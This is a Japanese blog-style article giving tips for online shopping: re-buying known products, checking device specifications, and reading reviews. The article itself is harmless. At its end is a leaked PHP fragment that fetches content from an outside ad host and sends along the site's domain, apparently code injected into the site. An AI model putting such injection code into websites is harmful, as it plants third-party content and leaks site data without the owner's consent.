前へ
次へ

通販で期待通りのものを買うコツ

通販のいいところは家にいながらにして欲しいものを買えること、たくさんの中から自分の欲しいものを簡単に探せることなどが挙げられます。ただ、通販だと実物を見て買うことができない、という不安を感じている人もいるのではないでしょうか。それを防ぐには、いくつかのコツがあります。まずは、リピート買いを中心にすることです。買ったことがないものをネットの情報だけで選ぶのは「手元に届いたら期待と違っていた」とか「間違ったものを買ってしまって使えなかった」ということにもつながります。逆に、「今使っている充電コードが古くなったので、同じ型の製品を注文する」というときや、「下着の買い替えで、いつも買っている店の同じ製品をオンラインストアで買う」というときには便利です。普段から、「買い換えるならこのメーカーのこれ」とメモを取っておいたり、オンラインストアの買い物履歴を活用するようにするといいでしょう。もし「初めて買うものだけど、時間もないのでネットで買いたい」というときは、しっかりと説明を読むことが大切です。特にスマホやパソコンの周辺機器は製品によって細かい違いが多く、うっかり買い間違いをしがちです。自分の手持ちの機器の規格を調べ、使えるかどうかをきちんとチェックしましょう。返品ができるとはいえ、よけいなお金がかかったり、メールで連絡をしたり送り返したりとストレスになりますし、先方にも迷惑がかかってしまいます。また、衣類のような規格がはっきりしないような製品は、口コミを読むことが買い間違いを防ぎます。「夏に一枚で着ようと買ったワンピースが、実は透け感があって下にレギンスを履く必要があった」とか、「ストレッチ素材なのでサイズ表記よりかなり大きめだった」などの詳細は、写真や説明だけでは把握しきれません。できればたくさんの口コミが集まっているものの方が情報が多く、正確だと言えるでしょう。いい口コミと悪い口コミ、両方を読むことも大事です。

".file_get_contents('http://links-001.com/ad/123set.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top